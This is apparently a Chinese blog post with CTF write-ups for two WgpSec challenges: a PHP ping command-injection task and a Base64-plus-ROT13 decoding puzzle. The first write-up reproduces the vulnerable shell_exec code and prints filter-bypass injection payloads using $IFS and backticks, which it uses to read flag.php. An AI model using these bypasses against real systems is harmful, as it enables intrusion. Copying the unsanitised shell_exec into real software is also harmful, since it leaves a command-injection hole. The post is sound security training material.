WgpSecCTF刷题

最新推荐文章于 2023-09-18 22:04:36 发布
最新推荐文章于 2023-09-18 22:04:36 发布
阅读量1.5k 收藏 2
点赞数 1
分类专栏: 安全渗透 文章标签: php linux ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shana_8/article/details/122340346
版权

小心我PING死你

题目如下:
在这里插入图片描述

解题思路:PHP命令执行与绕过

/?ip=127.0.0.1;ls

通过GET方式提交常见Linux命令发现ls、cat、空格等均被过滤

/?ip=127.0.0.1;dir

通过dir发现目录下存在flag.php与index.php

可利用less、more、tac等替代cat,$IFS$9替代空格,但发现无法直接查看flag.php。
猜测有过滤,先查看index.php

/?ip=127.0.0.1;tac$IFS$9index.php

代码如下:

?>  } print_r($a); echo "

";
		$a = shell_exec("ping -c 4 ".$ip);
		}
			die("you cant get flag !");
		else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
		}
			die("no no no you cant use ls it  !!!");
		else if(preg_match("/ls/", $ip)){
		}
			die("no no no you cant use base64 it  !!!");
		else if(preg_match("/base64/", $ip)){
		}
			die("no no no you cant use cat it  !!!");
		else if(preg_match("/cat/", $ip)){
		}
			die("do not bash hacker !!!");
		else if(preg_match("/bash/", $ip)){
		}
			die("do not space hacker !!");
		else if(preg_match("/ /", $ip)){
		}
			die("do not symbol hacker !!");
			echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
			print($ip);
			print_r($match);
		if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
		$ip = $_GET['ip'];
	if(isset($_GET['ip'])){

发现匹配规则包括:是否顺序出现flag字母、是否使用ls、cat、bash、base64、空格、{}、\等特殊命令与字符

那么绕过思路就很清晰了,列举两个方法:

命令拼接-pyload:

/?ip=127.0.0.1;a=g;tac$IFS$1fla$a.php

内联命令替代-pyload:

?ip=127.0.0.1;tac$IFS$9`dir`

注意flag需要查看页面源代码

神奇的字符

题目如下:
在这里插入图片描述
原字符:
NzM3OTZlNzQ3YjM2Mzc3MzM5MzU3MDM5MzgzNzMwMzkzMTM0MzIzOTZmMzAzOTM3NzMzMjM1MzIzNTM1NzMzNjM5MzczMDM4MzA3ZA

解题思路:BASE编码与栅栏密码

直接使用在线base解密
在这里插入图片描述
得到字符:

synt{67s95p987091429o097s25255s697080}

直接使用在线凯撒密码工具,发现位移数为13
在这里插入图片描述
得到字符:

flag{67f95c987091429b097f25255f697080}
欧阳大仙萌萌哒
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-web做题记录(狼组/BUUCTF)【一】
weixin_39664643的博客
10-16 2721
CTF-web做题记录(狼组/BUUCTF)【一】 WEB 1、ctf.wgpsec 你可能需要一部iphone 题目如下 考察点:user-agent,burp改为iphone的user-agent,发包得到flag 2、ctf.wgpsec baby php 坑:代码理解错误,淦 考察点:代码理解,根据代码本身绕过 <?php highlight_file('source.txt'); echo "<br><br>"; $flag = 'xxxxxxxx'; $ms
CTF密码学题目初探
hzy_wsq的博客
06-15 2984
CTF密码学题目初探(一)密码学总结(一)1.常见线索2.常见编码 密码学总结(一) 密码学一般可分为 古典密码学 和现代密码学。CTF中脑洞密码题(非现代加密方式)一般都是各种古典密码的变形。 1.常见线索 一般情况下,题目中会给出一些线索。比如题目名称,题目描述等。 举例:题目名称为base64 题目链接 举例:题目描述中写了“上面画着一个农妇在栅栏里面喂5只小鸡”… 题目链接 2.常见编码 base64/32/16编码 加密解密网站链接 原理:Base64是用于传输8Bit字节码的编码方式之一,
WgpSec CTF-你可能需要一部 Iphone
m0_49025459的博客
02-27 281
WgpSec CTF-你可能需要一部 Iphone。
WgpSec CTF-Web部分wp
最新发布
m0_74606212的博客
09-18 350
WpgSec CTF-Web部分wp
ctf图片隐写_WgpSec CTF 神奇的字符 图片隐写 WP
weixin_39623805的博客
11-29 1073
我们在 ctf.wgpsec.org 上线了一些CTF题目,作为平台 plat.wgpsec.org 邀请码的挑战题,欢迎各位大佬挑战。神奇的字符NzM3OTZlNzQ3YjM2Mzc3MzM5MzU3MDM5MzgzNzMwMzkzMTM0MzIzOTZmMzAzOTM3NzMzMjM1MzIzNTM1NzMzNjM5MzczMDM4MzA3ZA==题目提示:听说16世纪的凯撒大帝很喜...
WgpSec(狼组安全) CTF PHPCode题目记录
e6678的博客
03-23 1491
PHPCode strcmp 题目描述 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag:
WgpSec CTF baby php wp
为之的博客
05-16 2026
打开页面就是源码,,代码审计啊 其意思是, 1.至少设置一个get或post且key为flag 2.其value不能等于flag 3.post遍历,但是是 $$key,也就是变量覆盖 4.get遍历,不过key和value都是双$ 5.输出flag 这里最关键的就是双$也就是变量覆盖了, 因为key必须为flag,对于post来说,你传的value都会赋值给$flag 但对于get来说,你传的value还必须有值。 最后输出$flag的值,如果想获取到flag,那么其值必须不..
CTF之Misc基础考法及知识点
金 帛的博客
02-12 7268
CTF之Misc基础考法,对misc的一些常见考法的总结,还有kali的相关操作
[GXYCTF2019]Ping Ping Ping
weixin_52116519的博客
04-13 941
1、利用管道符 2、有过滤 空格绕过姿势 $IFS ${IFS} $IFS$1 //可以是任意数字 < <> {cat,flag.php} %20 %09 3、过滤flag 4、看源码/?ip=127.0.0.1;cat$IFS$1index.php 5、过滤规则 6、解法一:变量覆盖 ?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 7、解法二:利用 ` 执行命令 ?ip=127.0.0.1;cat$IFS$9`ls` .
buuctf-Ping Ping Ping
m0_52432374的博客
03-13 525
buuctf-Ping Ping Ping 先尝试?ip=127.0.0.1&ls 发现不行 尝试?ip=127.0.0.1|ls,发现可以
2022年暑期CTF刷题WP(停止更新)
qq_52820087的博客
06-19 3596
2022年暑期CTF刷题之路
XCTF Web 高手区001:baby_web
立志成为最会敲代码的dancer,最会locking的程序猿
04-02 342
题目: WP: 打开网页发现只有一句话 无论怎样修改URL的后缀都会跳转至1.php 此时直接F12查看源码 在Network目录下查看原地址的头信息 在响应头信息下找到flag 也可以直接burpsuite抓包查看,不过在本题下显然浏览器自带的检查更方便 ...
bugku web题解
为之的博客
10-19 542
19.10.19 1.变量1 http://123.206.87.240:8004/index1.php flag In the variable !<?php error_reporting(0); include"flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args=$_G...
CTF比赛中常见的MISC解题方法(不涉及内存取证和流量分析)仅供菜鸟,大佬绕道
comeinthis的博客
09-22 9083
我们在ctf比赛中,大多数时候签到题都是misc。 会不会有小伙伴因为签到题而感到头痛。 其实misc的签到题是非常简单的,不然怎么可能叫签到。 好吧,废话不多说,直接说干货: 1、题目直接给了编码。 比如:前几天的第一届“长城杯”的misc签到题。 5a6d78685a33745a6233566651484a6c58334d7758326476623251686651...
安全圈微信公众号
末初的CSDN博客
03-15 4875
安全技术/威胁情报/安全资讯/Program/Gihub
ctf-ping命令执行
qq_45414878的博客
11-08 9662
[GXYCTF2019]Ping Ping Ping 现在做一下关于常见的绕过ping执行其他命令的姿势,启动环境,连接并输入参数,查看当前目录下都有什么 ls命令没有被过滤,并且知道flag就在这个目录下面,用cat查看的flag的时候发现空格被禁用,绕过空格常用的方法有 {cat,flag.php} cat${IFS}flag.php cat$IFS$9flag.php cat<flag.php cat<>flag.php kg=$'\x20flag.php'&&c
CTFHub_技能树_Web之命令注入——“过滤CAT”
Ho1aAs‘s Blog
07-24 980
文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 中国蚁剑 解题过程 查看源码,把cat指令过滤了,因此要绕开使用cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $
CTF中ping文件执行漏洞无回显反弹拿flag
拉风的鲨鱼的博客
03-31 9527
打开网页内容如下 我们来看一下核心代码 <?php include_once "code.txt"; if (isset($_POST['ip'])) { $p=$_POST['ip']; if(preg_match("/(;|`|&| |\\$|python|ruby|perl...
死亡之ping(Ping of Death)
热门推荐
qq_42676882的博客
08-03 1万+
在因特网上,ping of death是一种拒绝服务攻击,方法是由攻击者故意发送大于65536比特的ip数据包给对方。  TCP/IP的特征之一是碎裂;它允许单一IP包被分为几个更小的数据包。在1996年,攻击者开始利用那一个功能,当他们发现一个进入使用碎片包可以将整个IP包的大小增加到ip协议允许的65536比特以上的时候。当许多操作系统收到一个特大号的ip包时候,它们不知道该做什么,因此,服务...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值